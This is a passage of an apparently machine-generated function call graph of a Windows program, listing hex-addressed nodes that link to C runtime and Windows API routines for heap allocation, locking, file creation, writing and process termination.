13b484f 6759->6760 6759->6763 6764 13b1cc3 6760->6764 6763->6722 6767 13b36f3 GetLastError 6764->6767 6766 13b1cc8 GetLastError 6766->6763 6781 13b403e 6767->6781 6769 13b3708 6770 13b3756 SetLastError 6769->6770 6771 13b4869 __calloc_crt 55 API calls 6769->6771 6770->6766 6772 13b371b 6771->6772 6772->6770 6773 13b405d __getptd_noexit TlsSetValue 6772->6773 6774 13b372f 6773->6774 6775 13b374d 6774->6775 6776 13b3735 6774->6776 6778 13b4831 _free 55 API calls 6775->6778 6777 13b3762 __initptd 55 API calls 6776->6777 6779 13b373d GetCurrentThreadId 6777->6779 6780 13b3753 6778->6780 6779->6770 6780->6770 6782 13b4051 6781->6782 6783 13b4055 TlsGetValue 6781->6783 6782->6769 6783->6769 6785 13b7508 6784->6785 6790 13b7523 6784->6790 6786 13b7514 6785->6786 6785->6790 6787 13b1cc3 __cftog_l 57 API calls 6786->6787 6791 13b7519 6787->6791 6788 13b7533 HeapAlloc 6788->6790 6788->6791 6790->6788 6790->6791 6793 13b1741 DecodePointer 6790->6793 6791->6734 6792->6735 6794 13b1754 6793->6794 6794->6790 6796 13b4453 EnterCriticalSection 6795->6796 6797 13b4440 6795->6797 6796->6743 6808 13b44b7 6797->6808 6799 13b4446 6799->6796 6800 13b17be __lock 57 API calls 6799->6800 6801 13b4452 6800->6801 6801->6796 7002 13b4599 LeaveCriticalSection 6802->7002 6804 13b37c5 6804->6746 7003 13b4599 LeaveCriticalSection 6805->7003 6807 13b3813 6807->6749 6809 13b44c3 __initptd 6808->6809 6810 13b44cc 6809->6810 6811 13b44e4 6809->6811 6832 13b1a75 6810->6832 6819 13b4505 __initptd 6811->6819 6874 13b48b1 6811->6874 6817 13b450f 6822 13b442f __lock 58 API calls 6817->6822 6818 13b4500 6821 13b1cc3 __cftog_l 58 API calls 6818->6821 6819->6799 6821->6819 6824 13b4516 6822->6824 6826 13b453b 6824->6826 6827 13b4523 6824->6827 6829 13b4831 _free 58 API calls 6826->6829 6828 13b40a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 6827->6828 6830 13b452f 6828->6830 6829->6830 6880 13b4557 6830->6880 6883 13b3e88 6832->6883 6834 13b1a7c 6835 13b1a89 6834->6835 6836 13b3e88 __NMSG_WRITE 58 API calls 6834->6836 6837 13b1ad2 __NMSG_WRITE 58 API calls 6835->6837 6839 13b1aab 6835->6839 6836->6835 6838 13b1aa1 6837->6838 6840 13b1ad2 __NMSG_WRITE 58 API calls 6838->6840 6841 13b1ad2 6839->6841 6840->6839 6842 13b1af0 __NMSG_WRITE 6841->6842 6843 13b3e88 __NMSG_WRITE 55 API calls 6842->6843 6870 13b1c17 6842->6870 6846 13b1b03 6843->6846 6845 13b1c80 6871 13b17a8 6845->6871 6847 13b1c1c GetStdHandle 6846->6847 6848 13b3e88 __NMSG_WRITE 55 API calls 6846->6848 6851 13b1c2a _strlen 6847->6851 6847->6870 6849 13b1b14 6848->6849 6849->6847 6850 13b1b26 6849->6850 6850->6870 6913 13b5457 6850->6913 6853 13b1c63 WriteFile 6851->6853 6851->6870 6853->6870 6855 13b1b53 GetModuleFileNameW 6857 13b1b73 6855->6857 6863 13b1b83 __wsetenvp 6855->6863 6856 13b1c84 6858 13b1e99 __invoke_watson 8 API calls 6856->6858 6859 13b5457 __wsetenvp 55 API calls 6857->6859 6860 13b1c8e 6858->6860 6859->6863 6861 13b1bc9 6861->6856 6931 13b53eb 6861->6931 6863->6856 6863->6861 6922 13b54cc 6863->6922 6866 13b53eb __NMSG_WRITE 55 API calls 6867 13b1c00 6866->6867 6867->6856 6868 13b1c07 6867->6868 6940 13b558a EncodePointer 6868->6940 6965 13b5770 6870->6965 6980 13b1774 GetModuleHandleExW 6871->6980 6876 13b48bf 6874->6876 6877 13b44f9 6876->6877 6879 13b48d2 6876->6879 6983 13b1147 6876->6983 6877->6817 6877->6818 6879->6876 6879->6877 7000 13b43a9 Sleep 6879->7000 7001 13b4599 LeaveCriticalSection 6880->7001 6882 13b455e 6882->6819 6884 13b3e92 6883->6884 6885 13b1cc3 __cftog_l 58 API calls 6884->6885 6886 13b3e9c 6884->6886 6887 13b3eb8 6885->6887 6886->6834 6890 13b1e89 6887->6890 6893 13b1e5e DecodePointer 6890->6893 6894 13b1e71 6893->6894 6899 13b1e99 IsProcessorFeaturePresent 6894->6899 6897 13b1e5e __cftog_l 8 API calls 6898 13b1e95 6897->6898 6898->6834 6900 13b1ea4 6899->6900 6905 13b1d2c 6900->6905 6904 13b1e88 6904->6897 6906 13b1d46 _memset ___raise_securityfailure 6905->6906 6907 13b1d66 IsDebuggerPresent 6906->6907 6908 13b43cc ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter 6907->6908 6910 13b1e2a ___raise_securityfailure 6908->6910 6909 13b5770 __atodbl_l 6 API calls 6911 13b1e4d 6909->6911 6910->6909 6912 13b43b7 GetCurrentProcess TerminateProcess 6911->6912 6912->6904 6914 13b5462 6913->6914 6915 13b5470 6913->6915 6914->6915 6918 13b5489 6914->6918 6916 13b1cc3 __cftog_l 58 API calls 6915->6916 6921 13b547a 6916->6921 6917 13b1e89 __cftog_l 9 API calls 6919 13b1b46 6917->6919 6918->6919 6920 13b1cc3 __cftog_l 58 API calls 6918->6920 6919->6855 6919->6856 6920->6921 6921->6917 6925 13b54da 6922->6925 6923 13b54de 6924 13b1cc3 __cftog_l 58 API calls 6923->6924 6926 13b54e3 6923->6926 6930 13b550e 6924->6930 6925->6923 6925->6926 6927 13b551d 6925->6927 6926->6861 6927->6926 6929 13b1cc3 __cftog_l 58 API calls 6927->6929 6928 13b1e89 __cftog_l 9 API calls 6928->6926 6929->6930 6930->6928 6932 13b5405 6931->6932 6935 13b53f7 6931->6935 6933 13b1cc3 __cftog_l 58 API calls 6932->6933 6934 13b540f 6933->6934 6936 13b1e89 __cftog_l 9 API calls 6934->6936 6935->6932 6938 13b5431 6935->6938 6937 13b1be9 6936->6937 6937->6856 6937->6866 6938->6937 6939 13b1cc3 __cftog_l 58 API calls 6938->6939 6939->6934 6941 13b55be ___crtIsPackagedApp 6940->6941 6942 13b567d IsDebuggerPresent 6941->6942 6943 13b55cd LoadLibraryExW 6941->6943 6946 13b56a2 6942->6946 6947 13b5687 6942->6947 6944 13b560a GetProcAddress 6943->6944 6945 13b55e4 GetLastError 6943->6945 6951 13b561e 7 API calls 6944->6951 6953 13b569a 6944->6953 6950 13b55f3 LoadLibraryExW 6945->6950 6945->6953 6948 13b5695 6946->6948 6949 13b56a7 DecodePointer 6946->6949 6947->6948 6952 13b568e OutputDebugStringW 6947->6952 6948->6953 6959 13b56ce DecodePointer DecodePointer 6948->6959 6964 13b56e6 6948->6964 6949->6953 6950->6944 6950->6953 6954 13b567a 6951->6954 6955 13b5666 GetProcAddress EncodePointer 6951->6955 6952->6948 6956 13b5770 __atodbl_l 6 API calls 6953->6956 6954->6942 6955->6954 6960 13b576c 6956->6960 6957 13b571e DecodePointer 6958 13b570a DecodePointer 6957->6958 6961 13b5725 6957->6961 6958->6953 6959->6964 6960->6870 6961->6958 6963 13b5736 DecodePointer 6961->6963 6963->6958 6964->6957 6964->6958 6966 13b577a IsProcessorFeaturePresent 6965->6966 6967 13b5778 6965->6967 6969 13b7ae6 6966->6969 6967->6845 6972 13b7a95 IsDebuggerPresent 6969->6972 6973 13b7aaa ___raise_securityfailure 6972->6973 6978 13b43cc SetUnhandledExceptionFilter UnhandledExceptionFilter 6973->6978 6975 13b7ab2 ___raise_securityfailure 6979 13b43b7 GetCurrentProcess TerminateProcess 6975->6979 6977 13b7acf 6977->6845 6978->6975 6979->6977 6981 13b178d GetProcAddress 6980->6981 6982 13b179f ExitProcess 6980->6982 6981->6982 6984 13b11c2 6983->6984 6990 13b1153 6983->6990 6985 13b1741 _malloc DecodePointer 6984->6985 6986 13b11c8 6985->6986 6987 13b1cc3 __cftog_l 57 API calls 6986->6987 6999 13b11ba 6987->6999 6988 13b1a75 __FF_MSGBANNER 57 API calls 6993 13b115e 6988->6993 6989 13b1186 RtlAllocateHeap 6989->6990 6989->6999 6990->6989 6992 13b11ae 6990->6992 6990->6993 6994 13b1741 _malloc DecodePointer 6990->6994 6997 13b11ac 6990->6997 6991 13b1ad2 __NMSG_WRITE 57 API calls 6991->6993 6995 13b1cc3 __cftog_l 57 API calls 6992->6995 6993->6988 6993->6990 6993->6991 6996 13b17a8 _doexit 3 API calls 6993->6996 6994->6990 6995->6997 6996->6993 6998 13b1cc3 __cftog_l 57 API calls 6997->6998 6998->6999 6999->6876 7000->6879 7001->6882 7002->6804 7003->6807 7007 13b4599 LeaveCriticalSection 7004->7007 7006 13b3b5a 7006->6639 7007->7006 7009 13b4945 EncodePointer 7008->7009 7009->7009 7010 13b495f 7009->7010 7010->6676 7014 13b4720 7011->7014 7013 13b4827 7013->6678 7015 13b472c __initptd 7014->7015 7022 13b1920 7015->7022 7021 13b4753 __initptd 7021->7013 7023 13b442f __lock 58 API calls 7022->7023 7024 13b1927 7023->7024 7025 13b4764 DecodePointer DecodePointer 7024->7025 7026 13b4741 7025->7026 7027 13b4791 7025->7027 7036 13b475e 7026->7036 7027->7026 7039 13b7421 7027->7039 7029 13b47f4 EncodePointer EncodePointer 7029->7026 7030 13b47c8 7030->7026 7033 13b48f8 __realloc_crt 61 API calls 7030->7033 7034 13b47e2 EncodePointer 7030->7034 7031 13b47a3 7031->7029 7031->7030 7046 13b48f8 7031->7046 7035 13b47dc 7033->7035 7034->7029 7035->7026 7035->7034 7073 13b1929 7036->7073 7040 13b742a 7039->7040 7041 13b743f HeapSize 7039->7041 7042 13b1cc3 __cftog_l 58 API calls 7040->7042 7041->7031 7043 13b742f 7042->7043 7044 13b1e89 __cftog_l 9 API calls 7043->7044 7045 13b743a 7044->7045 7045->7031 7049 13b48ff 7046->7049 7048 13b493c 7048->7030 7049->7048 7051 13b7452 7049->7051 7072 13b43a9 Sleep 7049->7072 7052 13b745b 7051->7052 7053 13b7466 7051->7053 7054 13b1147 _malloc 58 API calls 7052->7054 7055 13b746e 7053->7055 7066 13b747b 7053->7066 7057 13b7463 7054->7057 7056 13b4831 _free 58 API calls 7055->7056 7071 13b7476 __dosmaperr 7056->7071 7057->7049 7058 13b74b3 7060 13b1741 _malloc DecodePointer 7058->7060 7059 13b7483 HeapReAlloc 7059->7066 7059->7071 7061 13b74b9 7060->7061 7063 13b1cc3 __cftog_l 58 API calls 7061->7063 7062 13b74e3 7065 13b1cc3 __cftog_l 58 API calls 7062->7065 7063->7071 7064 13b1741 _malloc DecodePointer 7064->7066 7067 13b74e8 GetLastError 7065->7067 7066->7058 7066->7059 7066->7062 7066->7064 7068 13b74cb 7066->7068 7067->7071 7069 13b1cc3 __cftog_l 58 API calls 7068->7069 7070 13b74d0 GetLastError 7069->7070 7070->7071 7071->7049 7072->7049 7076 13b4599 LeaveCriticalSection 7073->7076 7075 13b1930 7075->7021 7076->7075 7083 13b11ee 7077->7083 7079 13b1025 VirtualAlloc 7080 13b147d 7079->7080 7599 13b1498 7080->7599 7082 13b1493 7082->6686 7086 13b11fa __initptd 7083->7086 7084 13b120d 7085 13b1cc3 __cftog_l 58 API calls 7084->7085 7087 13b1212 7085->7087 7086->7084 7088 13b123e 7086->7088 7089 13b1e89 __cftog_l 9 API calls 7087->7089 7102 13b2034 7088->7102 7099 13b121d __initptd @_EH4_CallFilterFunc@8 7089->7099 7091 13b1243 7092 13b1259 7091->7092 7093 13b124c 7091->7093 7095 13b1283 7092->7095 7096 13b1263 7092->7096 7094 13b1cc3 __cftog_l 58 API calls 7093->7094 7094->7099 7117 13b2153 7095->7117 7097 13b1cc3 __cftog_l 58 API calls 7096->7097 7097->7099 7099->7079 7103 13b2040 __initptd 7102->7103 7104 13b442f __lock 58 API calls 7103->7104 7115 13b204e 7104->7115 7105 13b20c2 7135 13b214a 7105->7135 7106 13b20c9 7107 13b48b1 __malloc_crt 58 API calls 7106->7107 7109 13b20d0 7107->7109 7109->7105 7111 13b40a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 7109->7111 7110 13b213f __initptd 7110->7091 7114 13b20f6 EnterCriticalSection 7111->7114 7112 13b44b7 __mtinitlocknum 58 API calls 7112->7115 7114->7105 7115->7105 7115->7106 7115->7112 7138 13b1f9d 7115->7138 7143 13b2007 7115->7143 7126 13b2173 __wopenfile 7117->7126 7118 13b218d 7120 13b1cc3 __cftog_l 58 API calls 7118->7120 7119 13b2348 7119->7118 7123 13b23ab 7119->7123 7121 13b2192 7120->7121 7122 13b1e89 __cftog_l 9 API calls 7121->7122 7124 13b128e 7122->7124 7150 13b625f 7123->7150 7132 13b12b0 7124->7132 7126->7118 7126->7119 7153 13b62b3 7126->7153 7129 13b62b3 __wcsnicmp 60 API calls 7130 13b2360 7129->7130 7130->7119 7131 13b62b3 __wcsnicmp 60 API calls 7130->7131 7131->7119 7592 13b1fcd 7132->7592 7134 13b12b6 7134->7099 7148 13b4599 LeaveCriticalSection 7135->7148 7137 13b2151 7137->7110 7139 13b1fa8 7138->7139 7140 13b1fbe EnterCriticalSection 7138->7140 7141 13b442f __lock 58 API calls 7139->7141 7140->7115 7142 13b1fb1 7141->7142 7142->7115 7144 13b2028 LeaveCriticalSection 7143->7144 7145 13b2015 7143->7145 7144->7115 7149 13b4599 LeaveCriticalSection 7145->7149 7147 13b2025 7147->7115 7148->7137 7149->7147 7161 13b5a43 7150->7161 7152 13b6278 7152->7124 7154 13b6351 7153->7154 7155 13b62c5 7153->7155 7504 13b6369 7154->7504 7157 13b1cc3 __cftog_l 58 API calls 7155->7157 7160 13b2341 7155->7160 7158 13b62de 7157->7158 7159 13b1e89 __cftog_l 9 API calls 7158->7159 7159->7160 7160->7119 7160->7129 7164 13b5a4f __initptd 7161->7164 7162 13b5a65 7163 13b1cc3 __cftog_l 58 API calls 7162->7163 7165 13b5a6a 7163->7165 7164->7162 7166 13b5a9b 7164->7166 7167 13b1e89 __cftog_l 9 API calls 7165->7167 7172 13b5b0c 7166->7172 7171 13b5a74 __initptd 7167->7171 7169 13b5ab7 7246 13b5ae0 7169->7246 7171->7152 7173 13b5b2c 7172->7173 7250 13b8a18 7173->7250 7175 13b5c7f 7176 13b1e99 __invoke_watson 8 API calls 7175->7176 7177 13b625e 7176->7177 7179 13b5a43 __wsopen_helper 103 API calls 7177->7179 7178 13b5b48 7178->7175 7180 13b5b82 7178->7180 7187 13b5ba5 7178->7187 7181 13b6278 7179->7181 7281 13b1c8f 7180->7281 7181->7169 7184 13b1cc3 __cftog_l 58 API calls 7185 13b5b94 7184->7185 7188 13b1e89 __cftog_l 9 API calls 7185->7188 7186 13b5c63 7189 13b1c8f __write 58 API calls 7186->7189 7187->7186 7194 13b5c41 7187->7194 7190 13b5b9e 7188->7190 7191 13b5c68 7189->7191 7190->7169 7192 13b1cc3 __cftog_l 58 API calls 7191->7192 7193 13b5c75 7192->7193 7195 13b1e89 __cftog_l 9 API calls 7193->7195 7257 13b6d16 7194->7257 7195->7175 7197 13b5d0f 7198 13b5d19 7197->7198 7199 13b5d3c 7197->7199 7201 13b1c8f __write 58 API calls 7198->7201 7275 13b59bb 7199->7275 7202 13b5d1e 7201->7202 7203 13b1cc3 __cftog_l 58 API calls 7202->7203 7205 13b5d28 7203->7205 7204 13b5ddc GetFileType 7206 13b5e29 7204->7206 7207 13b5de7 GetLastError 7204->7207 7209 13b1cc3 __cftog_l 58 API calls 7205->7209 7289 13b6fac 7206->7289 7210 13b1ca2 __dosmaperr 58 API calls 7207->7210 7208 13b5daa GetLastError 7284 13b1ca2 7208->7284 7209->7190 7213 13b5e0e CloseHandle 7210->7213 7215 13b5dcf 7213->7215 7216 13b5e1c 7213->7216 7214 13b59bb ___createFile 3 API calls 7217 13b5d9f 7214->7217 7219 13b1cc3 __cftog_l 58 API calls 7215->7219 7220 13b1cc3 __cftog_l 58 API calls 7216->7220 7217->7204 7217->7208 7219->7175 7221 13b5e21 7220->7221 7221->7215 7223 13b6002 7223->7175 7225 13b61d5 CloseHandle 7223->7225 7227 13b59bb ___createFile 3 API calls 7225->7227 7228 13b61fc 7227->7228 7231 13b6204 GetLastError 7228->7231 7245 13b608c 7228->7245 7229 13b1c8f __write 58 API calls 7241 13b5ec8 7229->7241 7230 13b2a2a 70 API calls __read_nolock 7230->7241 7232 13b1ca2 __dosmaperr 58 API calls 7231->7232 7234 13b6210 7232->7234 7233 13b5ed0 7233->7241 7307 13b897e 7233->7307 7322 13b86ed 7233->7322 7381 13b6ebf 7234->7381 7239 13b607f 7240 13b897e __close_nolock 61 API calls 7239->7240 7242 13b6086 7240->7242 7241->7223 7241->7230 7241->7233 7241->7239 7243 13b7054 60 API calls __lseeki64_nolock 7241->7243 7353 13b7d99 7241->7353 7244 13b1cc3 __cftog_l 58 API calls 7242->7244 7243->7241 7244->7245 7245->7175 7247 13b5b0a 7246->7247 7248 13b5ae6 7246->7248 7247->7171 7503 13b702e LeaveCriticalSection 7248->7503 7251 13b8a22 7250->7251 7252 13b8a37 7250->7252 7253 13b1cc3 __cftog_l 58 API calls 7251->7253 7252->7178 7254 13b8a27 7253->7254 7255 13b1e89 __cftog_l 9 API calls 7254->7255 7256 13b8a32 7255->7256 7256->7178 7258 13b6d22 __initptd 7257->7258 7259 13b44b7 __mtinitlocknum 58 API calls 7258->7259 7260 13b6d33 7259->7260 7261 13b442f __lock 58 API calls 7260->7261 7263 13b6d38 __initptd 7260->7263 7262 13b6d46 7261->7262 7265 13b6e26 7262->7265 7267 13b6dc6 EnterCriticalSection 7262->7267 7268 13b442f __lock 58 API calls 7262->7268 7273 13b6e94 7262->7273 7274 13b40a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 7262->7274 7390 13b6dee 7262->7390 7263->7197 7266 13b4869 __calloc_crt 58 API calls 7265->7266 7270 13b6e2f 7266->7270 7267->7262 7269 13b6dd6 LeaveCriticalSection 7267->7269 7268->7262 7269->7262 7270->7273 7393 13b6c88 7270->7393 7402 13b6eb6 7273->7402 7274->7262 7276 13b59c6 ___crtIsPackagedApp 7275->7276 7277 13b59ca GetModuleHandleW GetProcAddress 7276->7277 7278 13b5a21 CreateFileW 7276->7278 7280 13b59e7 7277->7280 7279 13b5a3f 7278->7279 7279->7204 7279->7208 7279->7214 7280->7279 7282 13b36f3 __getptd_noexit 58 API calls 7281->7282 7283 13b1c94 7282->7283 7283->7184 7285 13b1c8f __write 58 API calls 7284->7285 7286 13b1cab __dosmaperr 7285->7286 7287 13b1cc3 __cftog_l 58 API calls 7286->7287 7288 13b1cbe 7287->7288 7288->7215 7290 13b6fb8 7289->7290 7291 13b7014 7289->7291 7290->7291 7296 13b6fda 7290->7296 7292 13b1cc3 __cftog_l 58 API calls 7291->7292 7293 13b7019 7292->7293 7294 13b1c8f __write 58 API calls 7293->7294 7295 13b5e47 7294->7295 7295->7223 7295->7241 7298 13b7054 7295->7298 7296->7295 7297 13b6fff SetStdHandle 7296->7297 7297->7295 7410 13b6f45 7298->7410 7300 13b7064 7301 13b707d SetFilePointerEx 7300->7301 7302 13b706c 7300->7302 7304 13b7095 GetLastError 7301->7304 7305 13b5eb1 7301->7305 7303 13b1cc3 __cftog_l 58 API calls 7302->7303 7303->7305 7306 13b1ca2 __dosmaperr 58 API calls 7304->7306 7305->7229 7305->7241 7306->7305 7308 13b6f45 __close_nolock 58 API calls 7307->7308 7311 13b898c 7308->7311 7309 13b89e2 7310 13b6ebf __free_osfhnd 59 API calls 7309->7310 7315 13b89ea 7310->7315 7311->7309 7312 13b89c0 7311->7312 7313 13b6f45 __close_nolock 58 API calls 7311->7313 7312->7309 7314 13b6f45 __close_nolock 58 API calls 7312->7314 7316 13b89b7 7313->7316 7317 13b89cc CloseHandle 7314->7317 7318 13b8a0c 7315->7318 7321 13b1ca2 __dosmaperr 58 API calls 7315->7321 7319 13b6f45 __close_nolock 58 API calls 7316->7319 7317->7309 7320 13b89d8 GetLastError 7317->7320 7318->7233 7319->7312 7320->7309 7321->7318 7323 13b7054 __lseeki64_nolock 60 API calls 7322->7323 7324 13b870a 7323->7324 7325 13b876f 7324->7325 7327 13b7054 __lseeki64_nolock 60 API calls 7324->7327 7326 13b1cc3 __cftog_l 58 API calls 7325->7326 7328 13b877a 7325->7328 7326->7328 7331 13b8726 7327->7331 7328->7233 7329 13b880e 7332 13b8874 7329->7332 7335 13b7054 __lseeki64_nolock 60 API calls 7329->7335 7330 13b874f GetProcessHeap HeapAlloc 7333 13b876a 7330->7333 7343 13b8783 __setmode_nolock 7330->7343 7331->7325 7331->7329 7331->7330 7332->7325 7334 13b7054 __lseeki64_nolock 60 API calls 7332->7334 7336 13b1cc3 __cftog_l 58 API calls 7333->7336 7334->7325 7337 13b8826 7335->7337 7336->7325 7337->7325 7338 13b6f45 __close_nolock 58 API calls 7337->7338 7339 13b883a SetEndOfFile 7338->7339 7339->7332 7340 13b885a 7339->7340 7342 13b1cc3 __cftog_l 58 API calls 7340->7342 7344 13b885f 7342->7344 7345 13b87d4 7343->7345 7348 13b87e3 __setmode_nolock 7343->7348 7423 13b7e88 7343->7423 7347 13b1c8f __write 58 API calls 7344->7347 7346 13b1c8f __write 58 API calls 7345->7346 7349 13b87d9 7346->7349 7350 13b886a GetLastError 7347->7350 7351 13b87f8 GetProcessHeap HeapFree 7348->7351 7349->7348 7352 13b1cc3 __cftog_l 58 API calls 7349->7352 7350->7332 7351->7332 7352->7348 7354 13b7da5 __initptd 7353->7354 7355 13b7dc9 7354->7355 7356 13b7db2 7354->7356 7357 13b7e68 7355->7357 7359 13b7ddd 7355->7359 7358 13b1c8f __write 58 API calls 7356->7358 7360 13b1c8f __write 58 API calls 7357->7360 7361 13b7db7 7358->7361 7362 13b7dfb 7359->7362 7363 13b7e05 7359->7363 7364 13b7e00 7360->7364 7365 13b1cc3 __cftog_l 58 API calls 7361->7365 7366 13b1c8f __write 58 API calls 7362->7366 7367 13b6c88 ___lock_fhandle 59 API calls 7363->7367 7369 13b1cc3 __cftog_l 58 API calls 7364->7369 7376 13b7dbe __initptd 7365->7376 7366->7364 7368 13b7e0b 7367->7368 7370 13b7e1e 7368->7370 7371 13b7e31 7368->7371 7372 13b7e74 7369->7372 7373 13b7e88 __write_nolock 76 API calls 7370->7373 7375 13b1cc3 __cftog_l 58 API calls 7371->7375 7374 13b1e89 __cftog_l 9 API calls 7372->7374 7377 13b7e2a 7373->7377 7374->7376 7378 13b7e36 7375->7378 7376->7241 7499 13b7e60 7377->7499 7379 13b1c8f __write 58 API calls 7378->7379 7379->7377 7382 13b6f2b 7381->7382 7383 13b6ecb 7381->7383 7384 13b1cc3 __cftog_l 58 API calls 7382->7384 7383->7382 7389 13b6ef4 7383->7389 7385 13b6f30 7384->7385 7386 13b1c8f __write 58 API calls 7385->7386 7387 13b6f1c 7386->7387 7387->7245 7388 13b6f16 SetStdHandle 7388->7387 7389->7387 7389->7388 7405 13b4599 LeaveCriticalSection 7390->7405 7392 13b6df5 7392->7262 7394 13b6c94 __initptd 7393->7394 7395 13b6ce3 EnterCriticalSection 7394->7395 7397 13b442f __lock 58 API calls 7394->7397 7396 13b6d09 __initptd 7395->7396 7396->7273 7398 13b6cb9 7397->7398 7399 13b6cd1 7398->7399 7400 13b40a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 7398->7400 7406 13b6d0d 7399->7406 7400->7399 7409 13b4599 LeaveCriticalSection 7402->7409 7404 13b6ebd 7404->7263 7405->7392 7407 13b4599 _doexit LeaveCriticalSection 7406->7407 7408 13b6d14 7407->7408 7408->7395 7409->7404 7411 13b6f50 7410->7411 7413 13b6f65 7410->7413 7412 13b1c8f __write 58 API calls 7411->7412 7415 13b6f55 7412->7415 7414 13b1c8f __write 58 API calls 7413->7414 7416 13b6f8a 7413->7416 7417 13b6f94 7414->7417 7418 13b1cc3 __cftog_l 58 API calls 7415->7418 7416->7300 7419 13b1cc3 __cftog_l 58 API calls 7417->7419 7420 13b6f5d 7418->7420 7421 13b6f9c 7419->7421 7420->7300 7422 13b1e89 __cftog_l 9 API calls 7421->7422 7422->7420 7424 13b7e95 __write_nolock 7423->7424 7425 13b7ef3 7424->7425 7426 13b7ed4 7424->7426 7468 13b7ec9 7424->7468 7429 13b7f4b 7425->7429 7430 13b7f2f 7425->7430 7428 13b1c8f __write 58 API calls 7426->7428 7427 13b5770 __atodbl_l 6 API calls 7431 13b86e9 7427->7431 7432 13b7ed9 7428->7432 7434 13b7f64 7429->7434 7437 13b7054 __lseeki64_nolock 60 API calls 7429->7437 7433 13b1c8f __write 58 API calls 7430->7433 7431->7343 7435 13b1cc3 __cftog_l 58 API calls 7432->7435 7436 13b7f34 7433->7436 7482 13b6c34 7434->7482 7438 13b7ee0 7435->7438 7440 13b1cc3 __cftog_l 58 API calls 7436->7440 7437->7434 7441 13b1e89 __cftog_l 9 API calls 7438->7441 7444 13b7f3b 7440->7444 7441->7468 7442 13b7f72 7443 13b82cb 7442->7443 7491 13b36db 7442->7491 7445 13b82e9 7443->7445 7446 13b865e WriteFile 7443->7446 7447 13b1e89 __cftog_l 9 API calls 7444->7447 7449 13b840d 7445->7449 7465 13b82ff 7445->7465 7450 13b82be GetLastError 7446->7450 7455 13b828b 7446->7455 7447->7468 7452 13b8418 7449->7452 7453 13b8502 7449->7453 7450->7455 7452->7455 7460 13b8697 7452->7460 7466 13b847d WriteFile 7452->7466 7453->7455 7453->7460 7464 13b8577 WideCharToMultiByte 7453->7464 7472 13b85c6 WriteFile 7453->7472 7454 13b7fdd 7454->7443 7456 13b7fed GetConsoleCP 7454->7456 7459 13b83eb 7455->7459 7455->7460 7455->7468 7456->7460 7480 13b801c 7456->7480 7457 13b836e WriteFile 7457->7450 7457->7465 7458 13b1cc3 __cftog_l 58 API calls 7461 13b86c5 7458->7461 7462 13b868e 7459->7462 7463 13b83f6 7459->7463 7460->7458 7460->7468 7467 13b1c8f __write 58 API calls 7461->7467 7470 13b1ca2 __dosmaperr 58 API calls 7462->7470 7469 13b1cc3 __cftog_l 58 API calls 7463->7469 7464->7450 7464->7453 7465->7455 7465->7457 7465->7460 7466->7450 7466->7452 7467->7468 7468->7427 7471 13b83fb 7469->7471 7470->7468 7473 13b1c8f __write 58 API calls 7471->7473 7472->7453 7475 13b8619 GetLastError 7472->7475 7473->7468 7475->7453 7476 13b92d3 WriteConsoleW CreateFileW __putwch_nolock 7476->7480 7477 13b92bb 60 API calls __write_nolock 7477->7480 7478 13b8105 WideCharToMultiByte 7478->7455 7479 13b8140 WriteFile 7478->7479 7479->7450 7479->7480 7480->7450 7480->7455 7480->7476 7480->7477 7480->7478 7481 13b819a WriteFile 7480->7481 7496 13b91b5 7480->7496 7481->7450 7481->7480 7483 13b6c3f 7482->7483 7484 13b6c4c 7482->7484 7485 13b1cc3 __cftog_l 58 API calls 7483->7485 7486 13b6c58 7484->7486 7487 13b1cc3 __cftog_l 58 API calls 7484->7487 7488 13b6c44 7485->7488 7486->7442 7489 13b6c79 7487->7489 7488->7442 7490 13b1e89 __cftog_l 9 API calls 7489->7490 7490->7488 7492 13b36f3 __getptd_noexit 58 API calls 7491->7492 7493 13b36e1 7492->7493 7494 13b36ee GetConsoleMode 7493->7494 7495 13b17be __lock 58 API calls 7493->7495 7494->7443 7494->7454 7495->7494 7497 13b917b __isleadbyte_l 58 API calls 7496->7497 7498 13b91c2 7497->7498 7498->7480 7502 13b702e LeaveCriticalSection 7499->7502 7501 13b7e66 7501->7376 7502->7501 7503->7247 7505 13b637d 7504->7505 7513 13b6394 7504->7513 7506 13b6384 7505->7506 7508 13b63a5 7505->7508 7507 13b1cc3 __cftog_l 58 API calls 7506->7507 7509 13b6389 7507->7509 7515 13b4bfc 7508->7515 7511 13b1e89 __cftog_l 9 API calls 7509->7511 7511->7513 7512 13b8b0f 60 API calls __towlower_l 7514 13b63b0 7512->7514 7513->7160 7514->7512 7514->7513 7516 13b4c0d 7515->7516 7519 13b4c5a 7515->7519 7517 13b36db __write_nolock 58 API calls 7516->7517 7518 13b4c13 7517->7518 7521 13b4c3a 7518->7521 7523 13b7356 7518->7523 7519->7514 7521->7519 7538 13b4f1d 7521->7538 7524 13b7362 __initptd 7523->7524 7525 13b36db __write_nolock 58 API calls 7524->7525 7526 13b736b 7525->7526 7527 13b739a 7526->7527 7528 13b737e 7526->7528 7529 13b442f __lock 58 API calls 7527->7529 7531 13b36db __write_nolock 58 API calls 7528->7531 7530 13b73a1 7529->7530 7550 13b73d6 7530->7550 7535 13b7383 7531->7535 7536 13b7391 __initptd 7535->7536 7537 13b17be __lock 58 API calls 7535->7537 7536->7521 7537->7536 7539 13b4f29 __initptd 7538->7539 7540 13b36db __write_nolock 58 API calls 7539->7540 7541 13b4f33 7540->7541 7542 13b4f45 7541->7542 7543 13b442f __lock 58 API calls 7541->7543 7545 13b17be __lock 58 API calls 7542->7545 7547 13b4f53 __initptd 7542->7547 7544 13b4f63 7543->7544 7548 13b4831 _free 58 API calls 7544->7548 7549 13b4f90 7544->7549 7545->7547 7547->7519 7548->7549 7588 13b4fba 7549->7588 7551 13b73e1 ___addlocaleref ___removelocaleref 7550->7551 7553 13b73b5 7550->7553 7551->7553 7557 13b715c 7551->7557 7554 13b73cd 7553->7554 7587 13b4599 LeaveCriticalSection 7554->7587 7556 13b73d4 7556->7535 7565 13b7171 7557->7565 7586 13b71d5 7557->7586 7558 13b7222 7562 13b8d75 ___free_lc_time 58 API calls 7558->7562 7580 13b724b 7558->7580 7559 13b4831 _free 58 API calls 7560 13b71f6 7559->7560 7563 13b4831 _free 58 API calls 7560->7563 7561 13b71a2 7564 13b71c0 7561->7564 7574 13b4831 _free 58 API calls 7561->7574 7566 13b7240 7562->7566 7568 13b7209 7563->7568 7569 13b4831 